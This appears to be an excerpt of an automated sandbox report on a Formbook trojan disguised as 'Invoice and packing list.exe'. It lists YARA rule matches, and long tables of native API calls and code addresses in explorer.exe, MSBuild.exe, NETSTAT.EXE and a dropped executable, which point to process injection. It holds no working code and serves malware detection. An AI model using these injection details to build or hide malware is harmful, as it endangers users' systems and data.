Source: Process Memory Space: NETSTAT.EXE PID: 6580, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5968, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Invoice and packing list.exe

Source: C:\Windows\explorer.exe	Code function: 10_2_0F912E12 NtProtectVirtualMemory,	10_2_0F912E12
Source: C:\Windows\explorer.exe	Code function: 10_2_0F911232 NtCreateFile,	10_2_0F911232
Source: C:\Windows\explorer.exe	Code function: 10_2_0F912E0A NtProtectVirtualMemory,	10_2_0F912E0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041A320 NtCreateFile,	15_2_0041A320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041A3D0 NtReadFile,	15_2_0041A3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041A450 NtClose,	15_2_0041A450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041A500 NtAllocateVirtualMemory,	15_2_0041A500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041A31B NtCreateFile,	15_2_0041A31B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041A44B NtClose,	15_2_0041A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041A4FF NtAllocateVirtualMemory,	15_2_0041A4FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582B60 NtClose,LdrInitializeThunk,	15_2_01582B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	15_2_01582BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582AD0 NtReadFile,LdrInitializeThunk,	15_2_01582AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582D10 NtMapViewOfSection,LdrInitializeThunk,	15_2_01582D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582D30 NtUnmapViewOfSection,LdrInitializeThunk,	15_2_01582D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582DD0 NtDelayExecution,LdrInitializeThunk,	15_2_01582DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582DF0 NtQuerySystemInformation,LdrInitializeThunk,	15_2_01582DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582C70 NtFreeVirtualMemory,LdrInitializeThunk,	15_2_01582C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582CA0 NtQueryInformationToken,LdrInitializeThunk,	15_2_01582CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582F30 NtCreateSection,LdrInitializeThunk,	15_2_01582F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582FE0 NtCreateFile,LdrInitializeThunk,	15_2_01582FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582F90 NtProtectVirtualMemory,LdrInitializeThunk,	15_2_01582F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582FB0 NtResumeThread,LdrInitializeThunk,	15_2_01582FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582E80 NtReadVirtualMemory,LdrInitializeThunk,	15_2_01582E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	15_2_01582EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01584340 NtSetContextThread,	15_2_01584340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01584650 NtSuspendThread,	15_2_01584650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582BE0 NtQueryValueKey,	15_2_01582BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582B80 NtQueryInformationFile,	15_2_01582B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582BA0 NtEnumerateValueKey,	15_2_01582BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582AF0 NtWriteFile,	15_2_01582AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582AB0 NtWaitForSingleObject,	15_2_01582AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582D00 NtSetInformationFile,	15_2_01582D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582DB0 NtEnumerateKey,	15_2_01582DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582C60 NtCreateKey,	15_2_01582C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582C00 NtQueryInformationProcess,	15_2_01582C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582CC0 NtQueryVirtualMemory,	15_2_01582CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582CF0 NtOpenProcess,	15_2_01582CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582F60 NtCreateProcessEx,	15_2_01582F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582FA0 NtQuerySection,	15_2_01582FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582E30 NtWriteVirtualMemory,	15_2_01582E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01582EE0 NtQueueApcThread,	15_2_01582EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01583010 NtOpenDirectoryObject,	15_2_01583010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01583090 NtSetValueKey,	15_2_01583090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015835C0 NtCreateMutant,	15_2_015835C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015839B0 NtGetContextThread,	15_2_015839B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01583D70 NtOpenThread,	15_2_01583D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01583D10 NtOpenProcessToken,	15_2_01583D10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2BE0 NtQueryValueKey,LdrInitializeThunk,	16_2_038C2BE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	16_2_038C2BF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2B60 NtClose,LdrInitializeThunk,	16_2_038C2B60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2AD0 NtReadFile,LdrInitializeThunk,	16_2_038C2AD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2FE0 NtCreateFile,LdrInitializeThunk,	16_2_038C2FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2F30 NtCreateSection,LdrInitializeThunk,	16_2_038C2F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	16_2_038C2EA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2DD0 NtDelayExecution,LdrInitializeThunk,	16_2_038C2DD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2DF0 NtQuerySystemInformation,LdrInitializeThunk,	16_2_038C2DF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2D10 NtMapViewOfSection,LdrInitializeThunk,	16_2_038C2D10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2CA0 NtQueryInformationToken,LdrInitializeThunk,	16_2_038C2CA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2C60 NtCreateKey,LdrInitializeThunk,	16_2_038C2C60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2C70 NtFreeVirtualMemory,LdrInitializeThunk,	16_2_038C2C70
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C35C0 NtCreateMutant,LdrInitializeThunk,	16_2_038C35C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C4340 NtSetContextThread,	16_2_038C4340
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C4650 NtSuspendThread,	16_2_038C4650
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2B80 NtQueryInformationFile,	16_2_038C2B80
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2BA0 NtEnumerateValueKey,	16_2_038C2BA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2AB0 NtWaitForSingleObject,	16_2_038C2AB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2AF0 NtWriteFile,	16_2_038C2AF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2F90 NtProtectVirtualMemory,	16_2_038C2F90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2FA0 NtQuerySection,	16_2_038C2FA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2FB0 NtResumeThread,	16_2_038C2FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2F60 NtCreateProcessEx,	16_2_038C2F60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2E80 NtReadVirtualMemory,	16_2_038C2E80
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2EE0 NtQueueApcThread,	16_2_038C2EE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2E30 NtWriteVirtualMemory,	16_2_038C2E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2DB0 NtEnumerateKey,	16_2_038C2DB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2D00 NtSetInformationFile,	16_2_038C2D00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2D30 NtUnmapViewOfSection,	16_2_038C2D30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2CC0 NtQueryVirtualMemory,	16_2_038C2CC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2CF0 NtOpenProcess,	16_2_038C2CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C2C00 NtQueryInformationProcess,	16_2_038C2C00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C3090 NtSetValueKey,	16_2_038C3090
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C3010 NtOpenDirectoryObject,	16_2_038C3010
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C39B0 NtGetContextThread,	16_2_038C39B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C3D10 NtOpenProcessToken,	16_2_038C3D10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038C3D70 NtOpenThread,	16_2_038C3D70
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_02F6A3D0 NtReadFile,	16_2_02F6A3D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_02F6A320 NtCreateFile,	16_2_02F6A320
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_02F6A450 NtClose,	16_2_02F6A450
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_02F6A500 NtAllocateVirtualMemory,	16_2_02F6A500
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_02F6A31B NtCreateFile,	16_2_02F6A31B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_02F6A4FF NtAllocateVirtualMemory,	16_2_02F6A4FF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_02F6A44B NtClose,	16_2_02F6A44B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_036F9BAF NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	16_2_036F9BAF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_036FA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,	16_2_036FA036
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_036F9BB2 NtCreateSection,NtMapViewOfSection,	16_2_036F9BB2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_036FA042 NtQueryInformationProcess,	16_2_036FA042

Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_00E0E0B4	0_2_00E0E0B4
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_051DF798	0_2_051DF798
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_051DF7C0	0_2_051DF7C0
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_071A8650	0_2_071A8650
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_071AA6B0	0_2_071AA6B0
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_071A8EC0	0_2_071A8EC0
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_071A0B98	0_2_071A0B98
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_071A8A88	0_2_071A8A88
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_071AAAD9	0_2_071AAAD9
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_071AAAE8	0_2_071AAAE8
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_08D5ED58	0_2_08D5ED58
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_08D5DFEE	0_2_08D5DFEE
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_08D5B850	0_2_08D5B850
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_0C6E0040	0_2_0C6E0040
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_0C6E1880	0_2_0C6E1880
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_08D50040	0_2_08D50040
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_08D50006	0_2_08D50006
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_08D556D9	0_2_08D556D9
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_08D556E8	0_2_08D556E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B0100	9_2_018B0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01906000	9_2_01906000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CE3F0	9_2_018CE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_019402C0	9_2_019402C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_019165B2	9_2_019165B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_019165D0	9_2_019165D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0535	9_2_018C0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E4750	9_2_018E4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0770	9_2_018C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DC6E0	9_2_018DC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D6962	9_2_018D6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018F8890	9_2_018F8890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B28F0	9_2_018B28F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A68F1	9_2_018A68F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EE8F0	9_2_018EE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CA840	9_2_018CA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BEA80	9_2_018BEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2A45	9_2_018C2A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D8DBF	9_2_018D8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C8DC0	9_2_018C8DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CAD00	9_2_018CAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CED7A	9_2_018CED7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B0CF2	9_2_018B0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0C00	9_2_018C0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193EFA0	9_2_0193EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B2FC8	9_2_018B2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01902F28	9_2_01902F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E0F30	9_2_018E0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01934F40	9_2_01934F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D2ED9	9_2_018D2ED9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0E59	9_2_018C0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CB1B0	9_2_018CB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018F516C	9_2_018F516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AF172	9_2_018AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C33F3	9_2_018C33F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C52A0	9_2_018C52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DD2F0	9_2_018DD2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C3497	9_2_018C3497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_019074E0	9_2_019074E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018CB730	9_2_018CB730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C59DA	9_2_018C59DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C9950	9_2_018C9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DB950	9_2_018DB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B1979	9_2_018B1979
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C38E0	9_2_018C38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192D800	9_2_0192D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DFB80	9_2_018DFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01935BF0	9_2_01935BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018FDBF9	9_2_018FDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01933A6C	9_2_01933A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DFDC0	9_2_018DFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C3D40	9_2_018C3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01939C32	9_2_01939C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D9C20	9_2_018D9C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C1F92	9_2_018C1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C9EB0	9_2_018C9EB0
Source: C:\Windows\explorer.exe	Code function: 10_2_0F535B32	10_2_0F535B32
Source: C:\Windows\explorer.exe	Code function: 10_2_0F535B30	10_2_0F535B30
Source: C:\Windows\explorer.exe	Code function: 10_2_0F53B232	10_2_0F53B232
Source: C:\Windows\explorer.exe	Code function: 10_2_0F538912	10_2_0F538912
Source: C:\Windows\explorer.exe	Code function: 10_2_0F532D02	10_2_0F532D02
Source: C:\Windows\explorer.exe	Code function: 10_2_0F53E5CD	10_2_0F53E5CD
Source: C:\Windows\explorer.exe	Code function: 10_2_0F53A036	10_2_0F53A036
Source: C:\Windows\explorer.exe	Code function: 10_2_0F531082	10_2_0F531082
Source: C:\Windows\explorer.exe	Code function: 10_2_0F7B5B32	10_2_0F7B5B32
Source: C:\Windows\explorer.exe	Code function: 10_2_0F7B5B30	10_2_0F7B5B30
Source: C:\Windows\explorer.exe	Code function: 10_2_0F7BB232	10_2_0F7BB232
Source: C:\Windows\explorer.exe	Code function: 10_2_0F7B8912	10_2_0F7B8912
Source: C:\Windows\explorer.exe	Code function: 10_2_0F7B2D02	10_2_0F7B2D02
Source: C:\Windows\explorer.exe	Code function: 10_2_0F7BE5CD	10_2_0F7BE5CD
Source: C:\Windows\explorer.exe	Code function: 10_2_0F7BA036	10_2_0F7BA036
Source: C:\Windows\explorer.exe	Code function: 10_2_0F7B1082	10_2_0F7B1082
Source: C:\Windows\explorer.exe	Code function: 10_2_0F911232	10_2_0F911232
Source: C:\Windows\explorer.exe	Code function: 10_2_0F9145CD	10_2_0F9145CD
Source: C:\Windows\explorer.exe	Code function: 10_2_0F90E912	10_2_0F90E912
Source: C:\Windows\explorer.exe	Code function: 10_2_0F908D02	10_2_0F908D02
Source: C:\Windows\explorer.exe	Code function: 10_2_0F90BB30	10_2_0F90BB30
Source: C:\Windows\explorer.exe	Code function: 10_2_0F90BB32	10_2_0F90BB32
Source: C:\Windows\explorer.exe	Code function: 10_2_0F907082	10_2_0F907082
Source: C:\Windows\explorer.exe	Code function: 10_2_0F910036	10_2_0F910036
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Code function: 11_2_0130E0B4	11_2_0130E0B4
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Code function: 11_2_05B0B468	11_2_05B0B468
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Code function: 11_2_05B0DFEE	11_2_05B0DFEE
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Code function: 11_2_05B0EB20	11_2_05B0EB20
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Code function: 11_2_0C6E0940	11_2_0C6E0940
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Code function: 11_2_05B056E8	11_2_05B056E8
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Code function: 11_2_05B056D9	11_2_05B056D9
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Code function: 11_2_05B00006	11_2_05B00006
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Code function: 11_2_05B00040	11_2_05B00040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00401030	15_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041EAC3	15_2_0041EAC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041E524	15_2_0041E524
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041D580	15_2_0041D580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00402D90	15_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00409E50	15_2_00409E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00409E0A	15_2_00409E0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041EFDF	15_2_0041EFDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00402FB0	15_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015D8158	15_2_015D8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015EA118	15_2_015EA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01540100	15_2_01540100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_016081CC	15_2_016081CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_016101AA	15_2_016101AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0160A352	15_2_0160A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_016103E6	15_2_016103E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0155E3F0	15_2_0155E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015F0274	15_2_015F0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015D02C0	15_2_015D02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01550535	15_2_01550535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01610591	15_2_01610591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01602446	15_2_01602446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015FE4F6	15_2_015FE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01574750	15_2_01574750
